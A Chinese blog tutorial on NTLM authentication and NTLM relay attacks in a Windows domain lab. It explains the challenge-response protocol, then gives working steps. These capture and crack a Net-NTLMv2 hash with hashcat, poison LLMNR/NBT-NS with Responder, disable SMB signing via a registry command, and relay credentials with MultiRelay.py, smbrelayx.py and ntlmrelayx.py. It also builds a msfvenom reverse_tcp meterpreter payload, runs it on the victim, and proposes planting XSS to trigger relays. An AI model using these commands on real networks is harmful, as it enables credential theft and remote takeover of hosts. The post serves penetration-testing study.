关于TLM网络认证及NTLM-Relay攻击分析

已于 2023-09-18 22:16:31 修改
阅读量170 收藏
点赞数 2
文章标签: 网络 tornado maven symfony outlook
于 2023-09-18 13:32:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luoxiayan/article/details/132975111
版权

NTML网络认证

Windows认证分为本地认证和网络认证,当我们开机登录用户账户时,就需要将lsass.exe进程转换的明文密码hash与 sam文件进行比对,这种方式即为——本地认证

而当我们访问同一局域网的一台主机上的SMB共享时,需要提供凭证通过验证才能访问,这个过程就会设计windows的网络认证。

NTLM协议

NTLM协议的认证共需要三个步骤完成:协商、挑战、认证。也叫挑战响应机制

协商,这个是为了解决历史遗留问题,也就是为了向下兼容,双方先确定一下传输协议的版本等各种信息。版本主要分为两种:NTLMv1与NTLM v2
挑战,下面会介绍。
验证,对质询的最后结果进行一个验证,验证通过后,即允许访问资源

NTLMv1、NTLM v2区别

不同点

NTLM v1的Challenge有8位,NTLM v2的Challenge为16位
NTLM v1的主要加密算法是DES,NTLM v2的主要加密算法是HMAC-MD5。
共同点

都是通过NTLM Hash进行的加密

挑战的完整过程

在这里插入图片描述

工作组中

client向server发送用户信息(即用户名)请求
server接受到请求后,判断本地用户列表是否存在client发送的用户名,如果没有返回认证失败,如果有,生成一个16位的随机数即Challenge, 然后使用登录用户名对应的NTLM Hash加密Challenge, 生成Challenge1保存在内存中。同时,生成Challenge1后,将Challenge发送给client。
当client接收到Chalenge时,将发送的用户名所对应的NTLM hash对Chalenge进行加密即Response(NET-NTLM-Hash),并Response发送给server。
接着就是验证过程了,server在收到Response后,将其与Chalenge1进行比对,如果相同,则验证成功

域环境中

由于域机器SAM文件中不存在域用户的NTLM hash,所以服务器将客户端用户名、Challenge、response通过 Netlogon协议交到域控手中,让域控对其进行身份验证。
域控通过客户端用户名在自己的ntds.dit中找到对应的NTLM-Hash,用Challenge对其进行加密,再与NET-NTLM-Hash进行对比。如果相同则表示用户拥有的密码是正确的,否则则验证失败,DC将结果返回给服务器。
服务器根据DC的结果成功与否返回给客户端。

wirshark抓包分析

1、模拟client访问server的共享
在这里插入图片描述

2、抓包看下共享产生的SMB协议,其中Negotiate Protocol Responss就是进行协商的过程在这里插入图片描述

3、服务器向客户端返回16位长的challenge
在这里插入图片描述

4、接着客户端将发送的用户名所对应的NTLM hash对Chalenge进行加密得到Response
在这里插入图片描述

5、将获取到的Response进行Net-NTLMhash格式的拼接

Net-NTLMhash格式:

username::domain:challenge:HMAC-MD5:blob
username、domain即为:

challenge就是第二步中获取的内容:

7f3085e50542ee4d
HMAC-MD5即为NTProofStr的内容:
在这里插入图片描述

blob就是Response中除NTProofStr剩下的部分:

01010000000000005da4077f4b10d901d3c521d6bddc4ce50000000002001200530045004e00540049004d0045004e00540001001000570049004e00300038002d005000430004001a00730065006e00740069006d0065006e0074002e0063006f006d0003002c00570069006e00300038002d00700063002e00730065006e00740069006d0065006e0074002e0063006f006d0005001a00730065006e00740069006d0065006e0074002e0063006f006d00070008005da4077f4b10d901060004000200000008003000300000000000000000000000002000003b6ad2d6ec858ee23b79e3ddde29d57c3479fca6042d38c984b242c2b44d1e7f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350032002e00310037003100000000000000000000000000
所以拼接好的Net-NTLMhash为:

test::SENTIMENT:7f3085e50542ee4d:4d11723d0631436ee007f9bdb1ce3a45:01010000000000005da4077f4b10d901d3c521d6bddc4ce50000000002001200530045004e00540049004d0045004e00540001001000570049004e00300038002d005000430004001a00730065006e00740069006d0065006e0074002e0063006f006d0003002c00570069006e00300038002d00700063002e00730065006e00740069006d0065006e0074002e0063006f006d0005001a00730065006e00740069006d0065006e0074002e0063006f006d00070008005da4077f4b10d901060004000200000008003000300000000000000000000000002000003b6ad2d6ec858ee23b79e3ddde29d57c3479fca6042d38c984b242c2b44d1e7f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350032002e00310037003100000000000000000000000000

通过Net-NTLMhash破解密码

hashcat爆破
-m:hash的类型,5600对应NetNTLMv2,具体可参考:https://hashcat.net/wiki/doku.php
-o:输出文件
字典文件为password.txt
–force 强制执行,测试系统不支持Intel OpenCL
hashcat -m 5600 test::SENTIMENT:7f3085e50542ee4d:4d11723d0631436ee007f9bdb1ce3a45:01010000000000005da4077f4b10d901d3c521d6bddc4ce50000000002001200530045004e00540049004d0045004e00540001001000570049004e00300038002d005000430004001a00730065006e00740069006d0065006e0074002e0063006f006d0003002c00570069006e00300038002d00700063002e00730065006e00740069006d0065006e0074002e0063006f006d0005001a00730065006e00740069006d0065006e0074002e0063006f006d00070008005da4077f4b10d901060004000200000008003000300000000000000000000000002000003b6ad2d6ec858ee23b79e3ddde29d57c3479fca6042d38c984b242c2b44d1e7f0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00350032002e00310037003100000000000000000000000000 password.txt -o result.txt --force

Responder

下载地址:https://github.com/lgandx/Responder,kali自带在/usr/share/responder下,但有的时候不一定哪个好用,所以可以下载下来以备不时之需

前置知识

Windows系统名称解析顺序
当我们访问一个共享时 net use \aaa,其寻找这个主机名称会遵循以下的步骤:

本地hosts文件(%windir%\System32\drivers\etc\hosts)
DNS缓存/DNS服务器
链路本地多播名称解析(LLMNR)和NetBIOS名称服务(NBT-NS)
如果没有在1、2项中找到对应名称,系统就会通过链路本地多播名称解析(LLMNR)和Net-BIOS名称服务(NBT-NS)在本地进行名称解析。这时,客户端就会将未经认证的UDP广播到网络中,询问它是否为本地系统的名称,由于该过程未被认证,并且广播到整个网络,从而允许网络 上的任何机器响应并声称是这台机器。

因此当用户输入不存在、包含错误或者DNS中 没有的主机名时,通过Responder工具监听LLMNR和NetBIOS广播,就可以伪装成受害者要访问的这台机器,并从而让受害者交出相应的登陆凭证。核心过程与arp欺骗类似,我们可以让攻击者作中间人,截获到客户端的Net-NTLM Hash。

获取Net-NTLMhash

监听kali的eth1网卡

sudo responder -I eth1 -fv
同网段主机访问任意不存在用户
在这里插入图片描述

本地和缓存查询不到sfss时,内网主机就会将未经认证的UDP广播到网络中,询问谁是sfss,由于该过程未被认证,并且广播到整个网络,从而允许网络 上的任何机器响应并声称自己是sfss。此时kali伪装成sfss这台机器,接着进行ntlm认证。从而让受害者交出相应的登陆凭证(Net-NTLMhash)
在这里插入图片描述

之后就可以用hashcat进行爆破了

NTLM-Relay攻击

上边获取到Net-NTLMhash后对密码进行了爆破,但若我们爆破不出密码呢?这时就可以使用NTLM-relay攻击,也叫NTLM重放攻击。

原理
在这里插入图片描述

重放本身的含义就是:攻击者利用网络监听或者其他方式盗取认证凭据,之后再把它重新发给认证服务器。

因此NTLM重放攻击也就是将窃听到的客户端Net-NTLMhash,重放到服务端。而由于攻击者拥有了该凭证,因此服务端自然而然就认为攻击者就是客户端。如果这个凭据权限足够,那么就可以控制域内其它主机,所以凭据的权限很重要。这里攻击者其实就充当了一个中间人的身份。

Responder

攻击前提

NTLM Relay攻击时在域中通过relay到smb服务将管理组成员冲放到到一些敏感的机器上。

因此relay到smb服务要求被攻击机器不能开启SMB签名,域内主机的 SMB 签名默认关闭,但域控是默认开启的。

实验环境

虚拟机 IP
kali 192.168.52.199
Win2012(域控) 192.168.52.163
Win2016(域管理员登录) 192.168.52.198
Win2008(受害机) 192.168.52.171
1、先用RunFinger.py来查看下内网中开放的信息,可以看到163域控是开启了smb签名的,其他主机没有

python RunFinger.py -i 192.168.52.0/24
在这里插入图片描述

若域内其他主机开启了SMB Signing,可通过命令关闭对应服务( Windows Server系列中RequireSecuritySignature子键默认值为1)

reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v RequireSecuritySignature /t REG_DWORD /d 0 /f
2、修改responder的配置文件Responder.conf,不让其对 hash 进行抓取。将SMB和HTTP的On改为Off:

sudo vim /usr/share/responder/Responder.conf
在这里插入图片描述

3、开启responder监听

responder -I eth1
4、启动MultiRelay.py

cd /usr/share/responder/tools
python3 MultiRelay.py -t 要攻击的域内目标 -u ALL
python3 MultiRelay.py -t 192.168.52.171 -u ALL
5、由于需要高权限凭证,因此在WIN16上用域管理员权限登录
在这里插入图片描述

6、返回了win08的shell
在这里插入图片描述

impacket

impacket也有对应的exp

smbrelayx.py

1、在kali上执行如下命令监听 80 和 445 端口,伪造 http 和 smb 服务:

#SMBRelay 攻击 192.168.52.171 主机,并执行 whoami 命令
python3 smbrelayx.py -h 192.168.52.171 -c whoami
2、通过owa钓鱼或者其他手段诱导域管理员或其它拥有域管账号密码的域用户访问访问 http://192.168.52.199 :
在这里插入图片描述

3、这时就成功执行whoami命令,获取到了win08的system权限
在这里插入图片描述

4、利用该思路可以尝试上线到C2,先生成一个木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.163 LPORT=4444 -f exe -o shell.exe
#启动监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.52.199
set lport 4444
run
5、smbrelayx.py开始重放攻击,-e是要执行的文件

python3 smbrelayx.py -h 192.168.52.171 -e shell.exe
6、重复步骤2的操作,成功返回会话

7、但该会话很快就会被删除
在这里插入图片描述

因此应尽快做好进程迁移

run post/windows/manage/migrate

ntlmrelayx.py

与上述方式一样还可以用ntlmrelayx.py

python3 ntlmrelayx.py -t smb://192.168.52.171 -c whoami
除邮件钓鱼外,通过共享也可
在这里插入图片描述

扩展

其实相对于impacket中的方法,Reponder的更实用一些,因为impacket中的方法需要连接kali,在实战中有些鸡肋。。。

而Reponder中,直接通过net use的一个不存在用户的方法,也不太会发生,因此可以通过另一种方式让目标机器加载net use

因为在渗透前一定是拿到了一定权限的,那就可以通过在目标index界面中插入一条xss语句,当有管理员身份的用户访问时,便可触发重放攻击
在这里插入图片描述

「已注销」
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【从零开始学习 UVM】10.4、UVM TLM —— UVM TLM port -> Export -> Imp
努力,加油每一天鸭~
04-04 338
【从零开始学习 UVM】10.4、UVM TLM —— UVM TLM port -> Export -> Imp
开源RISCV简单虚拟原型/模拟器:RISC-V-TLM
qq_35990574的博客
12-02 2292
文章:Màrius Montón. 2020. A RISC-V SystemC-TLM simulator. In Fourth Workshop on Computer Architecture Research with RISC-V (CARRV 2020). ACM, New York, NY, USA, 4 pages. https://doi.org/10.1145/nnnnnnn.nnnnnnn 源码:https://github.com/mariusmm/RISC-V-TLM 1.虚拟原型
interface tlm是用来仿真的
oldmoney
08-16 51
bd中create interface。
NTLM-relay攻击的原理与实现
热门推荐
Shanfenglan's blog
09-28 16万+
CATALOGNTLM相关1.用处2.认证流程其他术语NT-hash/NTLM-hashLM-hashNet-NTLM hashSSPISSPNTLM-relay原理不同版本的NTLM认证对应的responseNTLM-relay攻击如何获取到NET-NTLM hash通过responder或者inveigh工具Inveighresponder破解NET-NTLM hash(v2)其它方式的NTLM-relay攻击利用impacket的ntlmrelayssmb协议访问:http协议访问参考文章 NTLM
SystemC/TLM: blocking & non-blocking transport
zgcjaxj的博客
08-24 2093
tlm_core/tlm_2/tlm_generic_payload/tlm_phase.h 中定义了四种最基本的phase : BEGIN_REQ=1, END_REQ, BEGIN_RESP, END_RESP。比如要模拟AXI 协议的5个channel,则可以新增 BEGIN_ { AXI_AW / AXI_AR / AXI_W / AXI_R / AXI_B } 和 END_ { AXI_AW / AXI_AR / AXI_W / AXI_R / AXI_B } 这 10个phase。
[UVM]UVM TLM1.0 Interface归纳总结 --- 图解UVM TLM1.0 Interface
元直的博客
04-18 2055
UVM TLM Interface
[UVM]UVM TLM2.0简介及应用实例分析
元直的博客
04-19 4197
UVM TLM2.0 通过前面博文的介绍,我们知道了UVM中各个组件之间的通信是通过TLM1.0的方式实现的。而伴随着SystemC模型的广泛应用,SystemC的主要通信机制TLM2.0也引起了UVM标准委员会的广泛兴趣。我们之前介绍过TLM协议本身并不依赖于某一种语言,而可以跨语言地完成它的传输标准...
33、34-SSRF攻击技术
XLbb的博客
05-19 1235
CSRF 是跨站请求伪造攻击,XSS 是实现 CSRF 的诸多手段中的一种,是由于没有在关键操作执行时进行是否由用户自愿发起的确认。简要介绍:gopher协议是比http协议更早出现的协议,现在已经不常用了,但是在SSRF漏洞利用中gopher可以说是万金油,因为可以使用gopher发送各种格式的请求包,这样变可以解决漏洞点不在GET参数的问题了。XXE 是 XML 外部实体注入攻击,XML 中可以通过调用实体来请求本地或者远程内容,和远程文件保护类似,会引发相关安全问题,例如敏感文件读取。
UVM--TLM2.0通信
创芯人--fly的博客
04-23 3844
本小节介绍了TLM2.0的相关内容,目前只作为初学笔记,以后在项目中遇到实际案例,会及时完善更新。
TLM5156H-Q1-车规级.pdf
07-22
LM5156xH-Q1系列是一款专为汽车应用设计的高性能、车规级非同步升压/SEPIC/反激式控制器。这款芯片符合AEC-Q100标准,温度等级为1,能够在-40°C至+125°C的工作温度范围内稳定工作,并且最高结温可达150°C,这使得...
A.RISC-V.SystemC-TLM.simulator
04-12
- **TLM-2 (Transaction Level Modeling)**: TLM-2提供了事务级别的建模方式,允许开发者在更高的抽象层次上描述系统组件之间的交互。这种模型简化了复杂系统的建模过程,并提高了仿真速度。 #### 模拟器结构与功能...
TLM-BUS_1_phase.zip_TLM_systemc tlm
09-19
标题 "TLM-BUS_1_phase.zip_TLM_systemc tlm" 涉及到的是SystemC中的TLM(Transaction Level Modeling)总线系统,特别是关于单阶段(1-phase)事务处理的实现。SystemC是一种硬件描述语言,用于构建和仿真复杂的...
电子维修中的海信平板电视故障分析及维修实例
11-03
在电子维修领域,尤其是针对海信平板电视的故障分析与维修,我们需要深入理解电视的工作原理和常见问题。这里我们通过三个具体的维修实例来探讨一些关键的技术点。 首先,实例一涉及的是海信TPW4219H型电视,其故障...
LV8731V-TLM-H;中文规格书,Datasheet资料参照.pdf
01-10
本文档是关于LV8731V-TLM-H微步进脉宽调制(PWM)恒流控制步进电机驱动器的规格书和数据手册。下面是对LV8731V-TLM-H的详细介绍和技术规格说明。 概述 LV8731V-TLM-H是双通道H桥驱动IC,可以实现微步进驱动和4W 1-...
网络安全入门教程(非常详细)从零基础入门到精通,看完这一篇就够了。
2401_84466359的博客
08-12 311
这个方向更符合于大部分人对“黑客”的认知,他们能够黑手机、黑电脑、黑网站、黑服务器、黑内网,万物皆可黑(当然是要有授权的,不然进橘子我可不管),这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。是一种面向对象、直译式电脑编程语言,具有近二十年的发展历史,成熟且稳定。压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。
深度解密CRLF注入与重定向漏洞:从原理到实践
2301_80064376的博客
08-08 890
重定向漏洞(Open Redirect)是一种安全漏洞,攻击者可以利用它将用户从受信任的网站重定向到恶意网站。这种漏洞通常出现在网站处理 URL 参数时,没有对用户输入进行适当验证。
开发android app用于移远模块读写IMEI 模组EC200DEULA-D08-SNNDA 支持socket连接读写IMEI
chenhao0568的专栏
08-07 376
发送{“function”: “write_imei”,“imei”: “860004050179648”}响应{“message”: “success”,“imei”: “860004050179648”}当结果正常时message为success,否则message给出英文具体原因,其它参数可能为空。发送{“function”: “read_imei”}响应{“message”: “success”}前面本地5902 转发到 后面设备为5902。PC与终端APP之间 json通信协议。
『渗透面试思路』——内网篇
最新发布
qq_48368964的博客
08-12 99
内网渗透测试思路 1. 环境准备:在进行内网渗透测试之前,需要先了解目标内网的情况,包括 IP 地址、子网掩码、网关、DNS、域名信息等。同时,还需要准备测试环境,例如 Kali Linux 等渗透测试工具和平台。 2. 主机发现:在内网中,需要先进行主机发现,确定内网中存活的主机和服务。可以使用 Nmap 等扫描工具来进行主机发现和端口扫描。 3. 漏洞扫描:在确定内网中的主机和服务后,需要对其进行漏洞扫描,以便找出存在漏洞的主机和服务。可以使用 Nessus、OpenVAS 等漏洞扫描工具来进行漏
SystemC的TLM-2.0标准详解
"这是关于SystemC TLM-2.0的介绍性资料,主要涵盖了Transaction Level Modeling(TLM)的基本概念、传输接口、DMI和调试接口、套接字、通用载荷、基础协议以及分析端口等内容。这份由John Aynsley编写的演示文稿详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值